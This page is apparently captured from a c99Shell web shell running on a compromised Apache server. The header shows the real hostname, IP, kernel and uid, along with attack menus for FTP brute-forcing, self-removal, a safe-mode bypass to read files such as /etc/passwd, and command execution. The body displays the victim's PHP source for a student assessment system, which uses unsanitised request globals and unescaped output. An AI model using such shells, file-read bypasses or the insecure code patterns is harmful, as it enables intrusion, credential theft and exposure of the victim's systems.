110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/eassess/admin/fileupdate/eassess/student/ drwxr-xr-x Free 53.7 GB of 127.8 GB (42.02%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

include_once "../global1.php";

include_once "../../class/clsConnection.php";

include_once "../../class/clsDB.php";

include_once "../class/clsDoAssessment.php";

include_once "../class/clsResultRQ.php";

include_once "../class/clsResultTQ.php";

 



$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);



$oReRQ = new ResultRQ($oC);

$oReTQ = new ResultTQ($oC);



$oDo = new DoAssessment($oC);



if($method=="add"){

    //-------------------> аЎзє¤иТгКиг№µТГТ§ DoAssessment

    $y = date('Y');

    $md = date('m-d');

    $dateNow = ($y+543)."-".$md;



    $oDo->AddNew();

    $oDo->doid=$doid;

    $oDo->defineid=$defineid;

    $oDo->studentId=$studentId;

    $oDo->officerId=$officerId;

      $oDo->classId=$classId; 

    $oDo->courseId=$courseId;

    $oDo->section=$section;

    $oDo->dateAss=$dateNow;

    $oDo->ttId=$ttId;

    $oDo->Save();



    $maxDoid = $oDo->getMaxDoid();

    

//    echo "<br> SumRQ = ".$SumRQ;

    

    for($RowRQ=1; $RowRQ<=$SumRQ; $RowRQ++){

        $sectionRQid = "sectionRQid".$RowRQ;

        $MRQid = "MRQid".$RowRQ;

        $selectMRQ = "selectMRQ".$RowRQ;



        $oReRQ->AddNew();

        $oReRQ->resultRQid=$resultRQid;

        $oReRQ->doid=$maxDoid;

        $oReRQ->sectionRQid=${$sectionRQid};

        $oReRQ->RQid=${$MRQid};

        $oReRQ->point=${$selectMRQ};

        $oReRQ->Save();

    }



    for($RowTQ=1; $RowTQ<=$SumTQ; $RowTQ++){

        $sectionTQid = "sectionTQid".$RowTQ;

        $TQid = "TQid".$RowTQ;

        $commentText = "textTQ".$RowTQ;

    

        $oReTQ->AddNew();

        $oReTQ->resultTQid=$resultTQid;

        $oReTQ->doid=$maxDoid;

        $oReTQ->sectionTQid=${$sectionTQid};

        $oReTQ->TQid=${$TQid};

        $oReTQ->comment=${$commentText};

        $oReTQ->Save();

    }



    ?>



    <form name="SendMsgForm" method="post" action = "msgFormHCourseComplete.php">

        <input type="hidden" name="assid" value="<? echo $assid ?>">

        <input type="hidden" name="defineid" value="<? echo $defineid ?>">

        <input type="hidden" name="studentId" value="<? echo $studentId ?>">

        <input type="hidden" name="officerId" value="<? echo $officerId ?>">

        <input type="hidden" name="classId" value="<? echo $classId ?>">

        <input type="hidden" name="courseId" value="<? echo $courseId ?>">

        <input type="hidden" name="section" value="<? echo $section ?>">

        <input type="hidden" name="ttId" value="<? echo $ttId ?>">

        <input type="hidden" name="flag7_mustDo" value="<?=$flag7_mustDo?>">

        <input type="hidden" name="flag6_mustDo" value="<?=$flag6_mustDo?>">

        <input type="hidden" name="flag8_mustDo" value="<?=$flag8_mustDo?>">

        <input type="hidden" name="flag0_mustDo" value="<?=$flag0_mustDo?>">

        <input type="hidden" name="flag1_mustDo" value="<?=$flag1_mustDo?>">

        <input type="hidden" name="flag5_mustDo" value="<?=$flag5_mustDo?>">

        <script type="text/javascript" language="JavaScript">

            document.SendMsgForm.submit();

        </script>

    </form>

<?

} //end if method



?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: